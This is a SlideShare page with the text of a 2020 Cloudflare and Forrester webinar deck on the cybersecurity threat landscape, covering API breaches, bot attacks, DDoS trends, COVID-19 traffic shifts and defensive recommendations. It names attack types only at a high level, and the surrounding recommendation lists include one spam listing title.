SlideShare uma empresa Scribd logo

Cybersecurity 2020 threat landscape and its implications (AMER)

Transferir como PPTX, PDF
Cloudflare
Cloudflare

Cybersecurity decisions have direct implications to individuals, enterprises and organizations but also have broader societal implications than ever before. In 2020 and beyond, technology promises to change our own experience and enhance our way of life, and those of our customers, significantly. This reliance and targeting have been magnified during COVID19, where the cybercriminals have sunk to new lows at the same time as that reliance on tech has increased. This session will explore how these technologies are going to change the experiences of our lives for the better and for the worse. It will explore the most recent cybersecurity breaches, predict the key security issues for 2020 and discuss current security priorities.

Tecnologia
1 de 42
1 Cybersecurity 2020 Threat Landscape and its Implications Featuring Guest Speaker from Forrester
2 Today’s Speakers Guest Speaker, Sandy Carielli Principal Analyst Forrester Arun Singh Product Marketing Lead, Security Cloudflare
3 Agenda 1 Security Threat Trends and Implications - 2 Recommendations and Solutions 3 Q&A
4 Cloudflare Introduction
5 Cloudflare is an intelligent, integrated global cloud network that delivers security, performance, and reliability for all your Internet infrastructure, people and connected devices. CLOUDFLARE’S MISSION: Help build a better Internet Confidential. Copyright © Cloudflare, Inc.
6 27M+ Internet properties 37 Tbps Of network capacity 200 Cities and 95+ countries 45B Cyber threats blocked each day in Q1 ‘20 99% Of the Internet-connected population in the developed world population is located within 100 milliseconds of our network Help Build A Better Internet 6 Note: Map Data as of Jan, 15, 2020
Cybersecurity 2020 Threat Landscape and its Implications Sandy Carielli Principal Analyst
8© 2020 Forrester. Reproduction Prohibited. 33% of firms suffered a breach as a result of an external attack. This is how.
9© 2020 Forrester. Reproduction Prohibited. Some Of The Top Threats In 2020 Are Web App Based Bots APIs Client Side Attacks Forrester Report: “Top Cybersecurity Threats In 2020”
10© 2020 Forrester. Reproduction Prohibited. The New Normal
11© 2020 Forrester. Reproduction Prohibited. Breaches Due To Improperly Secured APIs Common Causes Were Poor Access Control and Unauthenticated API Endpoints https://www.wired.com/story/i-scraped-millions-of-venmo-payments-your-data-is-at-risk/?verso=true https://www.csoonline.com/article/3268025/panera-bread-blew-off-breach-report-for-8-months-leaked-millions-of-customer-records.html https://www.theinquirer.net/inquirer/news/3066805/usps-data-breach-api-flaw https://threatpost.com/t-mobile-alerts-2-3-million-customers-of-data-breach-tied-to-leaky-api/136896/
12© 2020 Forrester. Reproduction Prohibited. https://www.owasp.org/images/5/59/API_Security_Top_10_RC.pdf
13© 2020 Forrester. Reproduction Prohibited. Client Side Validation + Poor API Authorization = Data Leakage 13
14© 2020 Forrester. Reproduction Prohibited. “Magecart Attacks Are A Supply Chain Problem” Forrester Report: “Top Cybersecurity Threats In 2020”
15 Increases in global Internet utilization
16
17 ITALY ● National quarantine ordered on March 9th, 2020 ● 20% increase in utilization
18 Global Trends ● Global increases in traffic in all regions ● Japan and India continue to see increases after a temporary decline in late March
19 ● 250% increase in websites related to kids activities ● Over 100% increase in the top 5 categories Categorical increases
20 Event related traffic declines ● Up to 50% decline in traffic at sporting event sites ● Travel sites experiencing similar declines
21 Rising security concerns
22
23 Hospital websites Almost 2x increase in attacks in March and April
24 Since the murder of George Floyd there’s also been a large increase in attacks on US government websites. Cyberattacks against the society The category with the biggest increase in cyberattacks was Advocacy Groups with a staggering increase of 1,120x.
25 Q1 DDoS Trends ● In Q1 2020, 92% of the attacks were under 10 Gbps, compared to 84% in Q4 2019
26 Q1 DDoS Trends ● Majority of the attacks peaked below 1 million packets per second (pps).
27 Q1 DDoS Trends ● 79% of DDoS attacks in Q1 lasted between 30 to 60 minutes, compared to 60% in Q4, which represents a 19% increase.
28 Late March events ● Largest attack mitigated (550 Gbps) ● 55% increase in number of attacks (compared to first half)
29 Late March events ● Largest attack mitigated (550 Gbps) ● 55% increase in number of attacks (compared to first half)
30 Application-level attacks ● United States accounted for the largest number of application-level attacks that Cloudflare blocked
31 Top 4 application attack vectors ● Command Injection ● SQL injection ● File Inclusion ● Fake search engine crawler
“Bad bots comprise about 20% of all web traffic.” - “Top Cybersecurity Threats In 2020,” Forrester Report
33© 2020 Forrester. Reproduction Prohibited. The Many Flavors Of Bad Bots Web scraping Credential Stuffing Checkout abuse Inventory hoarding Card fraud Web recon Ad fraud DDoS Business logic Influence fraud
34© 2020 Forrester. Reproduction Prohibited. Bot Attacks Impact Wider Range Of Personas Security Marketing Fraud eCommerce Customer Experience
35 Online Shoe Retailer Valuable inventory was hoarded, damaging brand and reducing revenue ● Premium limited release inventory was being purchased and “hoarded” by bots ● Approx. 75% of all traffic came from bots ● Resulted in high infrastructure costs ● Created bad will for customers ● Cloudflare solved with 0.1% false positive rate
36© 2020 Forrester. Reproduction Prohibited. From Sneakers To Toilet Paper: What Is “Valuable?”
37© 2020 Forrester. Reproduction Prohibited. The New Normal
Collaborate And Automate “Siloed teams perform even worse when everything is remote. The friction of work handoffs is further compounded by distance.” - “Agile, DevOps, And COVID-19,” Forrester Blog
39© 2020 Forrester. Reproduction Prohibited. • Enumerate, manage and protect API assets … and don’t trust client-side data! • Protect client-side code • Use bot management tooling to change the economics of bot attacks • Consider how the “new normal” changes how attackers might target your products or services • Invest in automation – but make sure your automations are built on solid processes • Focus on CI/CD integrations and collaboration in remote work situations Recommendations
Thank You. © 2020 Forrester. Reproduction Prohibited.
41 Thank you!
42 Q&A

Recomendados

Introduction to Cybersecurity
Introduction to CybersecurityIntroduction to Cybersecurity
Introduction to Cybersecurity
Adri Jovin
 
Cybersecurity Awareness Training Presentation v1.3
Cybersecurity Awareness Training Presentation v1.3Cybersecurity Awareness Training Presentation v1.3
Cybersecurity Awareness Training Presentation v1.3
DallasHaselhorst
 
Information Security Awareness Training by Wilfrid Laurier University
Information Security Awareness Training by Wilfrid Laurier UniversityInformation Security Awareness Training by Wilfrid Laurier University
Information Security Awareness Training by Wilfrid Laurier University
Atlantic Training, LLC.
 
Cyber Security and Cyber Awareness
Cyber Security and Cyber Awareness Cyber Security and Cyber Awareness
Cyber Security and Cyber Awareness
Jay Nagar
 
Cybersecurity in Oil & Gas Company
Cybersecurity in Oil & Gas CompanyCybersecurity in Oil & Gas Company
Cybersecurity in Oil & Gas Company
Eryk Budi Pratama
 
Security Awareness Training by Fortinet
Security Awareness Training by FortinetSecurity Awareness Training by Fortinet
Security Awareness Training by Fortinet
Atlantic Training, LLC.
 
Cybersecurity Priorities and Roadmap: Recommendations to DHS
Cybersecurity Priorities and Roadmap: Recommendations to DHSCybersecurity Priorities and Roadmap: Recommendations to DHS
Cybersecurity Priorities and Roadmap: Recommendations to DHS
John Gilligan
 
Cyber Security 101: Training, awareness, strategies for small to medium sized...
Cyber Security 101: Training, awareness, strategies for small to medium sized...Cyber Security 101: Training, awareness, strategies for small to medium sized...
Cyber Security 101: Training, awareness, strategies for small to medium sized...
Stephen Cobb
 

Recomendados

Introduction to Cybersecurity
Introduction to CybersecurityIntroduction to Cybersecurity
Introduction to Cybersecurity
Adri Jovin
 
Cybersecurity Awareness Training Presentation v1.3
Cybersecurity Awareness Training Presentation v1.3Cybersecurity Awareness Training Presentation v1.3
Cybersecurity Awareness Training Presentation v1.3
DallasHaselhorst
 
Information Security Awareness Training by Wilfrid Laurier University
Information Security Awareness Training by Wilfrid Laurier UniversityInformation Security Awareness Training by Wilfrid Laurier University
Information Security Awareness Training by Wilfrid Laurier University
Atlantic Training, LLC.
 
Cyber Security and Cyber Awareness
Cyber Security and Cyber Awareness Cyber Security and Cyber Awareness
Cyber Security and Cyber Awareness
Jay Nagar
 
Cybersecurity in Oil & Gas Company
Cybersecurity in Oil & Gas CompanyCybersecurity in Oil & Gas Company
Cybersecurity in Oil & Gas Company
Eryk Budi Pratama
 
Security Awareness Training by Fortinet
Security Awareness Training by FortinetSecurity Awareness Training by Fortinet
Security Awareness Training by Fortinet
Atlantic Training, LLC.
 
Cybersecurity Priorities and Roadmap: Recommendations to DHS
Cybersecurity Priorities and Roadmap: Recommendations to DHSCybersecurity Priorities and Roadmap: Recommendations to DHS
Cybersecurity Priorities and Roadmap: Recommendations to DHS
John Gilligan
 
Cyber Security 101: Training, awareness, strategies for small to medium sized...
Cyber Security 101: Training, awareness, strategies for small to medium sized...Cyber Security 101: Training, awareness, strategies for small to medium sized...
Cyber Security 101: Training, awareness, strategies for small to medium sized...
Stephen Cobb
 
Introduction to Cybersecurity
Introduction to CybersecurityIntroduction to Cybersecurity
Introduction to Cybersecurity
Krutarth Vasavada
 
Information Security Metrics - Practical Security Metrics
Information Security Metrics - Practical Security MetricsInformation Security Metrics - Practical Security Metrics
Information Security Metrics - Practical Security Metrics
Jack Nichelson
 
Information security awareness - 101
Information security awareness - 101Information security awareness - 101
Information security awareness - 101
mateenzero
 
Banks and cybersecurity v2
Banks and cybersecurity v2Banks and cybersecurity v2
Banks and cybersecurity v2
Semir Ibrahimovic
 
Cybersecurity Basics - Aravindr.com
Cybersecurity Basics - Aravindr.comCybersecurity Basics - Aravindr.com
Cybersecurity Basics - Aravindr.com
Aravind R
 
Implementing of a Cyber Security Program Framework from ISO 27032 to ISO 55001
Implementing of a Cyber Security Program Framework from ISO 27032 to ISO 55001Implementing of a Cyber Security Program Framework from ISO 27032 to ISO 55001
Implementing of a Cyber Security Program Framework from ISO 27032 to ISO 55001
PECB
 
Cybersecurity Risk Management Program and Your Organization
Cybersecurity Risk Management Program and Your OrganizationCybersecurity Risk Management Program and Your Organization
Cybersecurity Risk Management Program and Your Organization
McKonly & Asbury, LLP
 
Information Security Awareness Training
Information Security Awareness TrainingInformation Security Awareness Training
Information Security Awareness Training
Randy Bowman
 
Cybersecurity Awareness Training Presentation v2021.08
Cybersecurity Awareness Training Presentation v2021.08Cybersecurity Awareness Training Presentation v2021.08
Cybersecurity Awareness Training Presentation v2021.08
DallasHaselhorst
 
Cybersecurity: Cyber Risk Management for Banks & Financial Institutions
Cybersecurity: Cyber Risk Management for Banks & Financial InstitutionsCybersecurity: Cyber Risk Management for Banks & Financial Institutions
Cybersecurity: Cyber Risk Management for Banks & Financial Institutions
Shawn Tuma
 
Cybersecurity Awareness Training Presentation v1.2
Cybersecurity Awareness Training Presentation v1.2Cybersecurity Awareness Training Presentation v1.2
Cybersecurity Awareness Training Presentation v1.2
DallasHaselhorst
 
Introduction to PCI DSS
Introduction to PCI DSSIntroduction to PCI DSS
Introduction to PCI DSS
Saumya Vishnoi
 
Cyber Security Emerging Threats
Cyber Security Emerging ThreatsCyber Security Emerging Threats
Cyber Security Emerging Threats
isc2dfw
 
cybersecurity- A.Abutaleb
cybersecurity- A.Abutalebcybersecurity- A.Abutaleb
cybersecurity- A.Abutaleb
Fahmi Albaheth
 
Vulnerability Management Whitepaper PowerPoint Presentation Slides
Vulnerability Management Whitepaper PowerPoint Presentation SlidesVulnerability Management Whitepaper PowerPoint Presentation Slides
Vulnerability Management Whitepaper PowerPoint Presentation Slides
SlideTeam
 
Vulnerability Management Program
Vulnerability Management ProgramVulnerability Management Program
Vulnerability Management Program
Dennis Chaupis
 
Swift-cyber-attacks.pptx
Swift-cyber-attacks.pptxSwift-cyber-attacks.pptx
Swift-cyber-attacks.pptx
AmineRached2
 
Information security management system (isms) overview
Information security management system (isms) overviewInformation security management system (isms) overview
Information security management system (isms) overview
Julia Urbina-Pineda
 
Cyber Security for Financial Institutions
Cyber Security for Financial InstitutionsCyber Security for Financial Institutions
Cyber Security for Financial Institutions
Khawar Nehal khawar.nehal@atrc.net.pk
 
Employee Security Awareness Program
Employee Security Awareness ProgramEmployee Security Awareness Program
Employee Security Awareness Program
davidcurriecia
 
Digital Transformation & Cloud Profitability
Digital Transformation & Cloud ProfitabilityDigital Transformation & Cloud Profitability
Digital Transformation & Cloud Profitability
Gui Carvalhal
 
The cyber insurance market in china report by daxue consulting asian risks
The cyber insurance market in china report by daxue consulting asian risksThe cyber insurance market in china report by daxue consulting asian risks
The cyber insurance market in china report by daxue consulting asian risks
Daxue Consulting
 

Mais conteúdo relacionado

Mais procurados

Implementing of a Cyber Security Program Framework from ISO 27032 to ISO 55001
Implementing of a Cyber Security Program Framework from ISO 27032 to ISO 55001Implementing of a Cyber Security Program Framework from ISO 27032 to ISO 55001
Implementing of a Cyber Security Program Framework from ISO 27032 to ISO 55001
PECB
 
Cybersecurity Risk Management Program and Your Organization
Cybersecurity Risk Management Program and Your OrganizationCybersecurity Risk Management Program and Your Organization
Cybersecurity Risk Management Program and Your Organization
McKonly & Asbury, LLP
 
Information Security Awareness Training
Information Security Awareness TrainingInformation Security Awareness Training
Information Security Awareness Training
Randy Bowman
 
Cybersecurity Awareness Training Presentation v2021.08
Cybersecurity Awareness Training Presentation v2021.08Cybersecurity Awareness Training Presentation v2021.08
Cybersecurity Awareness Training Presentation v2021.08
DallasHaselhorst
 
Cybersecurity: Cyber Risk Management for Banks & Financial Institutions
Cybersecurity: Cyber Risk Management for Banks & Financial InstitutionsCybersecurity: Cyber Risk Management for Banks & Financial Institutions
Cybersecurity: Cyber Risk Management for Banks & Financial Institutions
Shawn Tuma
 
Cybersecurity Awareness Training Presentation v1.2
Cybersecurity Awareness Training Presentation v1.2Cybersecurity Awareness Training Presentation v1.2
Cybersecurity Awareness Training Presentation v1.2
DallasHaselhorst
 
Vulnerability Management Whitepaper PowerPoint Presentation Slides
Vulnerability Management Whitepaper PowerPoint Presentation SlidesVulnerability Management Whitepaper PowerPoint Presentation Slides
Vulnerability Management Whitepaper PowerPoint Presentation Slides
SlideTeam
 

Mais procurados (20)

Introduction to Cybersecurity
Introduction to CybersecurityIntroduction to Cybersecurity
Introduction to Cybersecurity
 
Information Security Metrics - Practical Security Metrics
Information Security Metrics - Practical Security MetricsInformation Security Metrics - Practical Security Metrics
Information Security Metrics - Practical Security Metrics
 
Information security awareness - 101
Information security awareness - 101Information security awareness - 101
Information security awareness - 101
 
Banks and cybersecurity v2
Banks and cybersecurity v2Banks and cybersecurity v2
Banks and cybersecurity v2
 
Cybersecurity Basics - Aravindr.com
Cybersecurity Basics - Aravindr.comCybersecurity Basics - Aravindr.com
Cybersecurity Basics - Aravindr.com
 
Implementing of a Cyber Security Program Framework from ISO 27032 to ISO 55001
Implementing of a Cyber Security Program Framework from ISO 27032 to ISO 55001Implementing of a Cyber Security Program Framework from ISO 27032 to ISO 55001
Implementing of a Cyber Security Program Framework from ISO 27032 to ISO 55001
 
Cybersecurity Risk Management Program and Your Organization
Cybersecurity Risk Management Program and Your OrganizationCybersecurity Risk Management Program and Your Organization
Cybersecurity Risk Management Program and Your Organization
 
Information Security Awareness Training
Information Security Awareness TrainingInformation Security Awareness Training
Information Security Awareness Training
 
Cybersecurity Awareness Training Presentation v2021.08
Cybersecurity Awareness Training Presentation v2021.08Cybersecurity Awareness Training Presentation v2021.08
Cybersecurity Awareness Training Presentation v2021.08
 
Cybersecurity: Cyber Risk Management for Banks & Financial Institutions
Cybersecurity: Cyber Risk Management for Banks & Financial InstitutionsCybersecurity: Cyber Risk Management for Banks & Financial Institutions
Cybersecurity: Cyber Risk Management for Banks & Financial Institutions
 
Cybersecurity Awareness Training Presentation v1.2
Cybersecurity Awareness Training Presentation v1.2Cybersecurity Awareness Training Presentation v1.2
Cybersecurity Awareness Training Presentation v1.2
 
Introduction to PCI DSS
Introduction to PCI DSSIntroduction to PCI DSS
Introduction to PCI DSS
 
Cyber Security Emerging Threats
Cyber Security Emerging ThreatsCyber Security Emerging Threats
Cyber Security Emerging Threats
 
cybersecurity- A.Abutaleb
cybersecurity- A.Abutalebcybersecurity- A.Abutaleb
cybersecurity- A.Abutaleb
 
Vulnerability Management Whitepaper PowerPoint Presentation Slides
Vulnerability Management Whitepaper PowerPoint Presentation SlidesVulnerability Management Whitepaper PowerPoint Presentation Slides
Vulnerability Management Whitepaper PowerPoint Presentation Slides
 
Vulnerability Management Program
Vulnerability Management ProgramVulnerability Management Program
Vulnerability Management Program
 
Swift-cyber-attacks.pptx
Swift-cyber-attacks.pptxSwift-cyber-attacks.pptx
Swift-cyber-attacks.pptx
 
Information security management system (isms) overview
Information security management system (isms) overviewInformation security management system (isms) overview
Information security management system (isms) overview
 
Cyber Security for Financial Institutions
Cyber Security for Financial InstitutionsCyber Security for Financial Institutions
Cyber Security for Financial Institutions
 
Employee Security Awareness Program
Employee Security Awareness ProgramEmployee Security Awareness Program
Employee Security Awareness Program
 

Semelhante a Cybersecurity 2020 threat landscape and its implications (AMER)

Emerging Cyber Security Opportunity in India
Emerging Cyber Security Opportunity in IndiaEmerging Cyber Security Opportunity in India
Emerging Cyber Security Opportunity in India
Sam Ghosh
 
CYBER-THREAT-LANDSCAPE-2021.pdf
CYBER-THREAT-LANDSCAPE-2021.pdfCYBER-THREAT-LANDSCAPE-2021.pdf
CYBER-THREAT-LANDSCAPE-2021.pdf
Krishna N
 
What Are Cyber Attacks All About? | Cyberroot Risk Advisory
What Are Cyber Attacks All About? | Cyberroot Risk AdvisoryWhat Are Cyber Attacks All About? | Cyberroot Risk Advisory
What Are Cyber Attacks All About? | Cyberroot Risk Advisory
CR Group
 

Semelhante a Cybersecurity 2020 threat landscape and its implications (AMER) (20)

Digital Transformation & Cloud Profitability
Digital Transformation & Cloud ProfitabilityDigital Transformation & Cloud Profitability
Digital Transformation & Cloud Profitability
 
The cyber insurance market in china report by daxue consulting asian risks
The cyber insurance market in china report by daxue consulting asian risksThe cyber insurance market in china report by daxue consulting asian risks
The cyber insurance market in china report by daxue consulting asian risks
 
Emerging Cyber Security Opportunity in India
Emerging Cyber Security Opportunity in IndiaEmerging Cyber Security Opportunity in India
Emerging Cyber Security Opportunity in India
 
Global Cyber Security Market: Insights & Forecast (2022-2026)
Global Cyber Security Market: Insights & Forecast (2022-2026)Global Cyber Security Market: Insights & Forecast (2022-2026)
Global Cyber Security Market: Insights & Forecast (2022-2026)
 
Must Know Cyber Security Stats of 2016
Must Know Cyber Security Stats of 2016Must Know Cyber Security Stats of 2016
Must Know Cyber Security Stats of 2016
 
CYBER-THREAT-LANDSCAPE-2021.pdf
CYBER-THREAT-LANDSCAPE-2021.pdfCYBER-THREAT-LANDSCAPE-2021.pdf
CYBER-THREAT-LANDSCAPE-2021.pdf
 
BIZGrowth Strategies - Cybersecurity Special Edition
BIZGrowth Strategies - Cybersecurity Special EditionBIZGrowth Strategies - Cybersecurity Special Edition
BIZGrowth Strategies - Cybersecurity Special Edition
 
Ninth Annual Cost of Cybercrime Study in Financial Services – 2019 Report
Ninth Annual Cost of Cybercrime Study in Financial Services – 2019 ReportNinth Annual Cost of Cybercrime Study in Financial Services – 2019 Report
Ninth Annual Cost of Cybercrime Study in Financial Services – 2019 Report
 
The 1% Who Can Take Down your Organization
The 1% Who Can Take Down your OrganizationThe 1% Who Can Take Down your Organization
The 1% Who Can Take Down your Organization
 
A New Year’s Ransomware Resolution
A New Year’s Ransomware ResolutionA New Year’s Ransomware Resolution
A New Year’s Ransomware Resolution
 
The Future Of the Internet
The Future Of the Internet The Future Of the Internet
The Future Of the Internet
 
Security troubles in e commerce website
Security troubles in e commerce websiteSecurity troubles in e commerce website
Security troubles in e commerce website
 
Cost of Cybercrime Study in Financial Services: 2019 Report
Cost of Cybercrime Study in Financial Services: 2019 ReportCost of Cybercrime Study in Financial Services: 2019 Report
Cost of Cybercrime Study in Financial Services: 2019 Report
 
Global Cyber Attacks report 2018 - 2019 | HaltDos
Global Cyber Attacks report 2018 - 2019 | HaltDosGlobal Cyber Attacks report 2018 - 2019 | HaltDos
Global Cyber Attacks report 2018 - 2019 | HaltDos
 
Future Watch: Cybersecurity market in South Africa
Future Watch: Cybersecurity market in South Africa Future Watch: Cybersecurity market in South Africa
Future Watch: Cybersecurity market in South Africa
 
The Imitation Game: Detecting and Thwarting Automated Bot Attacks
The Imitation Game: Detecting and Thwarting Automated Bot AttacksThe Imitation Game: Detecting and Thwarting Automated Bot Attacks
The Imitation Game: Detecting and Thwarting Automated Bot Attacks
 
Cybersecurity | Risk. Impact. Innovations.
Cybersecurity | Risk. Impact. Innovations.Cybersecurity | Risk. Impact. Innovations.
Cybersecurity | Risk. Impact. Innovations.
 
Developing Your Security Foundation: A Guide for Nonprofits During the Pandem...
Developing Your Security Foundation: A Guide for Nonprofits During the Pandem...Developing Your Security Foundation: A Guide for Nonprofits During the Pandem...
Developing Your Security Foundation: A Guide for Nonprofits During the Pandem...
 
Accounting for Cyber Risks - How much does Cyber actually cost the Industry?
Accounting for Cyber Risks - How much does Cyber actually cost the Industry?Accounting for Cyber Risks - How much does Cyber actually cost the Industry?
Accounting for Cyber Risks - How much does Cyber actually cost the Industry?
 
What Are Cyber Attacks All About? | Cyberroot Risk Advisory
What Are Cyber Attacks All About? | Cyberroot Risk AdvisoryWhat Are Cyber Attacks All About? | Cyberroot Risk Advisory
What Are Cyber Attacks All About? | Cyberroot Risk Advisory
 

Mais de Cloudflare

Succeeding with Secure Access Service Edge (SASE)
Succeeding with Secure Access Service Edge (SASE)Succeeding with Secure Access Service Edge (SASE)
Succeeding with Secure Access Service Edge (SASE)
Cloudflare
 
Close your security gaps and get 100% of your traffic protected with Cloudflare
Close your security gaps and get 100% of your traffic protected with CloudflareClose your security gaps and get 100% of your traffic protected with Cloudflare
Close your security gaps and get 100% of your traffic protected with Cloudflare
Cloudflare
 
Zero trust for everybody: 3 ways to get there fast
Zero trust for everybody: 3 ways to get there fastZero trust for everybody: 3 ways to get there fast
Zero trust for everybody: 3 ways to get there fast
Cloudflare
 
LendingTree and Cloudflare: Ensuring zero trade-off between security and cust...
LendingTree and Cloudflare: Ensuring zero trade-off between security and cust...LendingTree and Cloudflare: Ensuring zero trade-off between security and cust...
LendingTree and Cloudflare: Ensuring zero trade-off between security and cust...
Cloudflare
 
Strengthening security posture for modern-age SaaS providers
Strengthening security posture for modern-age SaaS providersStrengthening security posture for modern-age SaaS providers
Strengthening security posture for modern-age SaaS providers
Cloudflare
 
It’s 9AM... Do you know what’s happening on your network?
It’s 9AM... Do you know what’s happening on your network?It’s 9AM... Do you know what’s happening on your network?
It’s 9AM... Do you know what’s happening on your network?
Cloudflare
 
Bring speed and security to the intranet with cloudflare for teams
Bring speed and security to the intranet with cloudflare for teamsBring speed and security to the intranet with cloudflare for teams
Bring speed and security to the intranet with cloudflare for teams
Cloudflare
 
Accelerate your digital transformation
Accelerate your digital transformationAccelerate your digital transformation
Accelerate your digital transformation
Cloudflare
 

Mais de Cloudflare (20)

Succeeding with Secure Access Service Edge (SASE)
Succeeding with Secure Access Service Edge (SASE)Succeeding with Secure Access Service Edge (SASE)
Succeeding with Secure Access Service Edge (SASE)
 
Close your security gaps and get 100% of your traffic protected with Cloudflare
Close your security gaps and get 100% of your traffic protected with CloudflareClose your security gaps and get 100% of your traffic protected with Cloudflare
Close your security gaps and get 100% of your traffic protected with Cloudflare
 
Why you should replace your d do s hardware appliance
Why you should replace your d do s hardware applianceWhy you should replace your d do s hardware appliance
Why you should replace your d do s hardware appliance
 
Don't Let Bots Ruin Your Holiday Business - Snackable Webinar
Don't Let Bots Ruin Your Holiday Business - Snackable WebinarDon't Let Bots Ruin Your Holiday Business - Snackable Webinar
Don't Let Bots Ruin Your Holiday Business - Snackable Webinar
 
Why Zero Trust Architecture Will Become the New Normal in 2021
Why Zero Trust Architecture Will Become the New Normal in 2021Why Zero Trust Architecture Will Become the New Normal in 2021
Why Zero Trust Architecture Will Become the New Normal in 2021
 
HARTMANN and Cloudflare Learn how healthcare providers can build resilient in...
HARTMANN and Cloudflare Learn how healthcare providers can build resilient in...HARTMANN and Cloudflare Learn how healthcare providers can build resilient in...
HARTMANN and Cloudflare Learn how healthcare providers can build resilient in...
 
Zero trust for everybody: 3 ways to get there fast
Zero trust for everybody: 3 ways to get there fastZero trust for everybody: 3 ways to get there fast
Zero trust for everybody: 3 ways to get there fast
 
LendingTree and Cloudflare: Ensuring zero trade-off between security and cust...
LendingTree and Cloudflare: Ensuring zero trade-off between security and cust...LendingTree and Cloudflare: Ensuring zero trade-off between security and cust...
LendingTree and Cloudflare: Ensuring zero trade-off between security and cust...
 
Network Transformation: What it is, and how it’s helping companies stay secur...
Network Transformation: What it is, and how it’s helping companies stay secur...Network Transformation: What it is, and how it’s helping companies stay secur...
Network Transformation: What it is, and how it’s helping companies stay secur...
 
Scaling service provider business with DDoS-mitigation-as-a-service
Scaling service provider business with DDoS-mitigation-as-a-serviceScaling service provider business with DDoS-mitigation-as-a-service
Scaling service provider business with DDoS-mitigation-as-a-service
 
Application layer attack trends through the lens of Cloudflare data
Application layer attack trends through the lens of Cloudflare dataApplication layer attack trends through the lens of Cloudflare data
Application layer attack trends through the lens of Cloudflare data
 
Recent DDoS attack trends, and how you should respond
Recent DDoS attack trends, and how you should respondRecent DDoS attack trends, and how you should respond
Recent DDoS attack trends, and how you should respond
 
Strengthening security posture for modern-age SaaS providers
Strengthening security posture for modern-age SaaS providersStrengthening security posture for modern-age SaaS providers
Strengthening security posture for modern-age SaaS providers
 
Kentik and Cloudflare Partner to Mitigate Advanced DDoS Attacks
Kentik and Cloudflare Partner to Mitigate Advanced DDoS AttacksKentik and Cloudflare Partner to Mitigate Advanced DDoS Attacks
Kentik and Cloudflare Partner to Mitigate Advanced DDoS Attacks
 
Stopping DDoS Attacks in North America
Stopping DDoS Attacks in North AmericaStopping DDoS Attacks in North America
Stopping DDoS Attacks in North America
 
It’s 9AM... Do you know what’s happening on your network?
It’s 9AM... Do you know what’s happening on your network?It’s 9AM... Do you know what’s happening on your network?
It’s 9AM... Do you know what’s happening on your network?
 
Cyber security fundamentals (simplified chinese)
Cyber security fundamentals (simplified chinese)Cyber security fundamentals (simplified chinese)
Cyber security fundamentals (simplified chinese)
 
Bring speed and security to the intranet with cloudflare for teams
Bring speed and security to the intranet with cloudflare for teamsBring speed and security to the intranet with cloudflare for teams
Bring speed and security to the intranet with cloudflare for teams
 
Accelerate your digital transformation
Accelerate your digital transformationAccelerate your digital transformation
Accelerate your digital transformation
 
Cyber security fundamentals (Cantonese)
Cyber security fundamentals (Cantonese)Cyber security fundamentals (Cantonese)
Cyber security fundamentals (Cantonese)
 

Último

08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men
Delhi Call girls
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slide
vu2urc
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Miguel Araújo
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI Solutions
Enterprise Knowledge
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
Principled Technologies
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Service
giselly40
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Drew Madelung
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path Mount
Puma Security, LLC
 

Último (20)

08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slide
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
 
Real Time Object Detection Using Open CV
Real Time Object Detection Using Open CVReal Time Object Detection Using Open CV
Real Time Object Detection Using Open CV
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI Solutions
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day Presentation
 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdf
 
What Are The Drone Anti-jamming Systems Technology?
